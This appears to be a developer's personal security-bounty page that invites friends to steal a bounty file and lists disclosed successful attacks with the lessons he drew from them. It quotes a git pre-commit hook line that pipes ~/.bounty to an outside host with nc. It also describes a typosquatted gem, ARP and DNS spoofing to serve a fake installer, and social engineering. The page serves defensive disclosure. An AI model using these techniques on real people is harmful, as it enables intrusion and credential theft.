I encourage you to gain unauthorized access to my computer or accounts.
If you do, I'm offering a treasure hunt price in bitcoin.
Try to steal these:
Beating me up or threatening with physical violence is not fair game. Blackmailing or physically stealing my laptop or computer from my hands while I'm using it is also not allowed.
I have not secured my home against physical break-ins.
Don't break into my house for these bounties. It's okay if I let you in.
My phone and laptop computer are logged in to Facebook, Twitter, and Gmail. If you manage to find them unlocked, you'll be able to retrieve these.
The point of the game is to educate people on security. If you find a vulnerability, but are unable to fully exploit it, please let me know. You may be able to receive a partial bounty without retrieving the hidden treasures.
As a security professional, I am required to maintain a certain level of paranoia and best operational security practices when it comes to my accounts and systems. In order to have a rigorous threat model, my security must be associated with a monetary value. Putting a bounty on it gives me a certain amount of confidence that my security has a certain financial lower bound.
I work on cryptography and cryptocurrency tools which require high level of security. Access to my computers or accounts could negatively affect the people using my tools.
I am also associated with the bitcoin community and a core developer of OpenBazaar. Access to my computers or accounts by malicious parties could negatively affect my open source projects. Many people rely on my GPG signatures on the OpenBazaar releases and on my commit access to make sure they are secure. If my signatures are to be treated as trustworthy, I need to have some confidence that my systems are secure.
Attack succeeded. Pay out of ฿ 0.8.
I was facing a bug with git during which my repository ended up in a broken state. I was trying to create a minimal testcase in order to file a git bug report. During that process, I shared with Petros, who is a git expert, my issue on gist, so that we could reproduce together, minimize the testcase further, report the git bug, and write a patch. This gist made it clear to Petros that I am making these tests on my local laptop, which is where my bounty file is located.
As I was sharing the issue with Petros, I packed my repository into a tarball and sent it to him. When he received the tarball, he unpacked it and issued a couple of commit commands on his machine. While my tarball was not malicious, at this point he realized this could have been used as an attack vector for arbitrary command execution by including a pre-commit hook file in the .git folder of the tarred repository.
In response to this, he decided to attack me using this exact method. He did a couple of commits and claimed he was seeing a certain number of warnings on his local machine. This was a social engineering trick. Subsequently, he packed up a .tar file containing his altered repository and sent it to me, claiming he wanted me to reproduce the warning messages he was seeing.
Due to a small mistake in his attack hook, it took two attempts to gain arbitrary command execution on my machine. His first tarball had a hook which only read the first line of my ~/.bounty file; the second attempt used a second tar file which worked properly. The hook file, .git/hooks/pre-commit, contained the following simple script:
cat ~/.bounty | nc petrosagg.com 9001 || true
petrosagg.com was his own server in which he was listening on port 9001 for incoming data – in this case my bounty file.
While I inspected the repository for malicious contents upon tarball extraction, I only looked at the files tracked within the repository, not within the .git folder, which was the location of the malware.
Programs such as git have complicated behaviors. It's impossible to fully understand what all programs do and their special intricacies. These behaviors may evolve over time and some may be underdocumented. Similar behavior can exist in other software such as TeX. Therefore, it is wise to extract such files within a sandboxed environment, even when they seem innocuous.
Following this attack, I will extract files sent to me by others in a sandboxed environment, unless they are clearly non-executable (such as images, video, and audio). Folders such as git repositories, compilation of TeX files, renderings of local HTML files, and so on should be ran in sandboxed environments (such as VMs, chroots, or docker), even if it seems that they do not normally have arbitrary command execution. Obviously these are a different case than plain executable, compilable, or interpretable files, but must still be accounted for.
Dimitris attempted to record my password as I typed it on my laptop. He used a hidden high-FPS GoPro camera. He made multiple attempts while I was living at his home for 10 days. As I lowered the lid of my laptop while typing my password, he was not able to accurately capture my password. The length and unpredictability of my password, as well as the limited amount of days he had, helped eliminate this attack.
Be aware of my surroundings when typing my password. Check the surroundings for obvious cameras at the ceiling or behind me and try to have a wall behind me. Monitor people around me while I'm typing: They may be using their phones to record me. Always lower the lid while typing sensitive passwords, even if I am home alone, to make it a habit.
Nikos claimed he had received a cryptography challenge from his business partner. He claimed it was a program containing a list of questions and answers in the form of a challenge, and challenged me to answer the questions.
Before he was willing to send me the challenge, he requested that we screen share over Skype, to make sure I don't simply look at the file for answers. He also challenges me to get a better score than he did. I agree, we do a skype call, and I do a screenshare with him, so he sends me the challenge. He adds a backstory to the challenge that includes weird challenge names and a relationship to the person who created them, making it more believable. Of course, nikos was the one who wrote the challenge, but he claimed it was from someone else.
I ask if I can cat the file and he says "no", because I would then see the answers. I then open up a virtual machine and attempt to move the file into the virtual machine, but nikos claims that the screen sharing is frozen when I look at the virtual machine and he can't observe, which of course was a social engineering lie. I propose to use Teamviewer as an alternative screen sharing mechanism, but he claims to have formatted his computer recently and having difficulty installing Teamviewer, another social engineering lie. I then propose I just play fairly and run the file within the VM without him looking, but he says I can just cat it.
I cat the file on my regular computer and inspect the file overall. It really does look like a list of questions and answers from top to bottom. I see some echo statements, some if checks and some read statements. I don't look too carefully because I don't want to read the answers within the script.
I then say "Looks good" and run the script. I see the script downloads a pcap file to use as part of a question, but at this point I realize it was a mistake to run it without careful inspection, so I stop the script. Fortunately, at this point, it was not too late. I open the file in vim and observe that there's a reference to my bounty file after more careful inspection. Busted!
My reaction to this challenge was embarassingly bad. I ran a file from an untrusted source without careful inspection and without using a virtual machine. I fell victim to simple social engineering techniques and psychological tricks. He was able to use my willingness to trust my friends, my willingness to be challenged, and my willingness to play fair. He also used my sympathy for technology frustration when screen sharing was not working properly and when teamviewer was not installed.
I realize the most insecure element of my system and my protection is me. If I decide to break my own policies of always running insecure software within a VM, I am vulnerable. I should be more careful and diligent about running untrusted software. If it's impossible to run within a VM, I should not run it at all, or I should run it on a separate computer. For example, I could run it within an amazon instance. I could also have asked to use Google Hangouts for screensharing, or insisted on installing Teamviewer. I could have insisted on playing fairly within the VM. Finally, the game could have waited a few hours until I set up a Linode instance, which incidentally would be cheaper than paying the challenge payout at my current price.
When it comes to policy, I will be more insisting and less polite, regardless of what my friends tell me, and I will not break policy for convenience reasons.
Petros claimed to be learning Ruby for a week before this attack. He subsequently contacted me to get help with his Ruby code. He claimed his code doesn't work and shared it with me. It was an innocent-looking piece of ruby code:
Interestingly, it was using the SimpleHttps gem, which looks a lot like the official httpsimple gem. Petros had published this gem on github under the account name boris842, which looks a lot like boris317, the name of the original author of httpsimple. He also published this gem so that it was installable using gem install.
Like pip and npm, there is no check in what code is uploaded, and it can be malicious. Names of gems are first-come-first-serve and can be claimed by anyone.
As I was discussing this attack vector recently with colleagues from Google, I went to the github project page to verify its authenticity. I noticed that there were very few stars on the project. If the project had more stars, it's possible that I would have ran this code without further attention. This is not a good idea, as stars can be manipulated using sybil attacks.
Upon closer inspection of the source tree, I noticed that the code was authored by boris317, the legit author, and almost a year ago, making it look innocent. This was possible, as git commits can be authored arbitrarily and pushed at all. Also, the project did not appear to be a fork. Upon visual inspection of the code, I noticed there was a reference to the petrosagg.sexy domain name. Looking closer at the code, I noticed there was a reference to the .bounty file.
Be more diligent when installing packages using pip, npm, gem. Run untrusted external programs in VMs or docker containers. Make it a policy to run new programs in containers unless they need special privileges.
Attack succeeded. Pay out of ฿ 0.0436.
Mario was able to access my laptop which I left unlocked for 30 seconds when I went to the bathroom.
Make it a point to lock my devices even when I am alone to make it a habit.
Attack succeeded. Pay out of ฿ 0.0436.
Dimitris was able to access Facebook through my phone which was locked with a password, but I had disabled immediate locking for usability, so my phone was left unlocked while charging.
Re-enabled immediate locking, enabled full disk encryption on phone.
Attack succeeded. Pay out of ฿ 0.0218.
Dimitris was able to access Facebook through my phone which was locked with a pattern that he found by looking as I was drawing it. He was able to look at it because he pretended to be sleeping when I drew it.
Changed from pattern to passphrase.
Attack succeeded. No payout schedule had been established at the time.
A detailed full disclosure is available on petros' blog. A short version follows.
Petros entered my apartment building by tailgating another resident without my presence. He then installed a custom PC which he had built from a modified cable TV decoding system. He installed this PC at the unlocked elevator control room of my building, which was situated in the 5th floor, close to my apartment which I was residing in on the 4th floor, to achieve good wireless reception. He modified the room's light bulb outlet power socket to pull out a regular power socket with which he powered his PC in the room. He got my WPA WiFi password from a colleague who was visiting me, chorvus.
Petros configured the PC to be robust and reconnect to my WiFi network as soon as it booted up. Using my Internet connection, it then used SSH to connect to one of his public servers. Using that forward SSH connection, he opened a remote SSH tunnel, allowing him to SSH back from his public server to that PC. Thus, he had constant remote access to my local network. He used this network access to ARP spoof the network with ettercap. Using ARP spoofing, he modified the DNS response for certain chosen domain names to point to his own server's IP.
At the time, we were working on implementing video calling for our social network, Zino. He convinced me to download the new beta version of Skype which featured video calling. When I started the Skype download, he pointed the download link's DNS to his own servers. Since Skype was being downloaded over HTTP, this did not cause any warnings. He then served an appropriate binary file in the place of the regular one. He made sure the served binary was large enough and had the appropriate application icon of Skype. I did not verify HTTPS downloads or signatures at the time, so I ran the downloaded setup binary blindly, thinking my network was trusted. Upon running his custom binary, my system was compromised.
Always assume the network is compromised. Only run verified software by ensuring the download is HTTPS from a trusted domain name, GPG-signed with a trusted key, or available through a package manager with an appropriate checksum.
Also don't violate my privacy, steal my bitcoins or make GPG signatures in my name. Follow common sense.
Typical theoretical treatments of operational security remain problematically unpragmatic even when performed by experienced professionals. As you will see in the list of successful past attacks, even though I am somewhat aware of my security, often the cheapest and easiest ways of attacking are unexpected and I tend to be worrying about more advanced problems when I am vulnerable to the simplest possible attacks.
By encouraging white-hat friends and colleagues to attack me and disclose their methods, I am protecting myself against malicious attackers who could attempt targeted concealed and persistent attacks. White-hats and black-hats use similar methodologies. If the bounty is collected, I improve my defences and certain methods are no longer applicable.
I do not base my security on obscurity. Therefore, I am disclosing my basic policies here so that I can help potential adversaries who are treasure hunting. While I try not to, I may deviate from these policies under social engineering pressure, so even though I may think I am secure, it may be worth a shot. Some of my policies are outlined in the Hall of Fame above.
Several colleagues are following the bounty game I introduced, as they feel it helps them improve their opsec practices. Their bounties are listed below. Their rules of engagement are similar to those above. If you have a bounty on your machine, let me know and I will add you to this list.
Steal the ~/.bounty file on his linux laptop.
Steal the ~/.bounty file on his linux laptop.
Steal the ~/.bounty file on his Linux laptop.
Steal the ~/.bounty file on his Linux laptop.
Steal the E:\bounty file on his Windows 10 desktop.
Steal the email with subject "Bounty secret" from his gmail.
Access his Facebook.
Access his Gmail.
* Collaborative projects are: Ting, OpenBazaar, unimeet and all decrypto.org projects.
Allowing me to work on collaborative projects safely will let me be more productive on these.